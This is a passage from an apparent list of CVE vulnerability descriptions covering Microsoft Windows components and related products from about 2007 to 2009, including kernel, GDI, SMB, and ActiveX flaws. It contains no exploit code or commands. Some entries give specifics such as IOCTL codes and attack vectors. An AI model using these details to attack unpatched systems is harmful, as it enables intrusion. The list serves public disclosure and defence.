Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows 